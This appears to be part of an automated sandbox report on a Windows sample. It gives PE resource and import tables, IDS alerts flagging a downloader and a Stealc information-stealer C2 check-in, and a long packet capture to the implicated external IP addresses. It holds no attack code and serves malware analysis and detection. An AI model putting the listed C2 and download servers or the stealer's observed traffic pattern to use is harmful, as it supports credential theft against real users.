RT_GROUP_ICON | 0x14a570 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x139280 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x143d48 | 0x68 | data | Turkish | Turkey | 0.7211538461538461
RT_GROUP_ICON | 0x13fab8 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_VERSION | 0x14cce8 | 0x1b0 | data | | | 0.5856481481481481
DLL | Import
KERNEL32.dll | GetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
WINHTTP.dll | WinHttpOpenRequest
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T18:58:18.093755+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-26T18:58:19.631888+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP
2024-10-26T18:58:28.019793+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 18:58:16.967888117 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:16.967999935 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:16.968084097 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:16.981204033 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:16.981236935 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:17.600290060 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:17.600378990 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:17.676747084 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:17.676775932 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:17.677160025 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:17.677212954 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:17.680881977 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:17.723330021 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:18.093764067 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:18.093832970 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.093857050 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:18.093879938 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:18.093894958 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.093909979 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.563343048 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.563344002 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.563388109 CEST | 443 | 49730 | 104.21.56.70 | 192.168.2.4
Oct 26, 2024 18:58:18.563519955 CEST | 49730 | 443 | 192.168.2.4 | 104.21.56.70
Oct 26, 2024 18:58:18.716468096 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:18.722917080 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:18.723037958 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:18.723166943 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:18.729404926 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631794930 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631834984 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631851912 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631863117 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631882906 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631887913 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.631894112 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631905079 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631911993 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631918907 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.631923914 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.631936073 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.632114887 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.632114887 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.632114887 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.632114887 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.637486935 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.637530088 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.637562990 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.637578964 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764058113 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764081955 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764096975 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764125109 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764161110 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764205933 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764249086 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764265060 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764277935 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764291048 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764312029 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764322996 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764338017 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.764942884 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.764991045 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765058041 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765101910 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765111923 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765125036 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765136957 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765153885 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765172958 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765547037 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765588045 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765594006 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765599966 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765619993 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765629053 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765635014 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.765645981 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765656948 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.765676975 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.766504049 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.766566038 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.766578913 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.766602039 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.766624928 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.766643047 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.766658068 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.766678095 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.766705036 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.769731045 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.769777060 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.769809008 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.769860983 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.769865036 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.769912958 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.769927025 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.769974947 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 26, 2024 18:58:19.909370899 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909399986 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909413099 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909425974 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909439087 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909451962 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 26, 2024 18:58:19.909518003 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909552097 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909590960 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909600019 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909627914 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909663916 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909708977 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909720898 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909732103 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909745932 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909759045 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909867048 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909904957 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.909905910 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.909949064 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910007000 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910034895 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910039902 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910047054 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910059929 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910073042 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910077095 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910096884 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910123110 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910429955 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910440922 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910451889 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910465956 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910471916 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910491943 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910515070 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910753012 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910794973 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910799980 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910810947 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910836935 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910850048 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910881042 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910892963 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910903931 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910921097 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910928965 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910943985 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910959959 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910969973 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.910973072 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.910996914 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911005020 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911485910 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911530972 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911534071 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911546946 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911560059 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911566973 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911583900 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911600113 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911628962 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911640882 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911652088 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911667109 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911667109 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911691904 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911714077 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.911716938 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911729097 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.911761045 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912314892 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912355900 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912384033 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912395954 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912440062 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912440062 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912446976 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912466049 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912477970 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912482977 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912492990 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.912497997 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912516117 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.912533045 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.916318893 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.916363001 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.916405916 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.916419029 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.916430950 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.916445971 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.916469097 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:19.916584015 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:19.916625977 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055144072 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055166006 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055181026 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055255890 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055267096 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055269957 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055325031 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055329084 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055339098 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055352926 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055375099 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055392981 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055399895 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055414915 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055427074 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055435896 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055466890 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055480003 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055491924 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055505991 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055522919 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055541992 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055674076 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055686951 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055699110 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.055716991 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.055751085 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056034088 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056077957 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056092978 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056104898 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056133986 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056133986 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056145906 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056159019 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056166887 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056194067 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056575060 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056595087 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056612968 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056613922 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056634903 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056648016 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056710958 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056724072 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056735039 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056746960 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056751013 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056762934 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056782961 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056785107 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056793928 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056806087 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056821108 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056823969 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056833029 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056844950 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056849957 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056876898 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056878090 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056889057 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.056946993 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.056946993 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057059050 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057097912 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057099104 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057140112 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057148933 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057183981 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057185888 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057197094 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057208061 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057233095 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057249069 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057256937 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057296038 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057305098 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057317019 CEST8049731176.113.115.37192.168.2.4
                                                                                  Oct 26, 2024 18:58:20.057341099 CEST4973180192.168.2.4176.113.115.37
                                                                                  Oct 26, 2024 18:58:20.057358980 CEST4973180192.168.2.4176.113.115.37
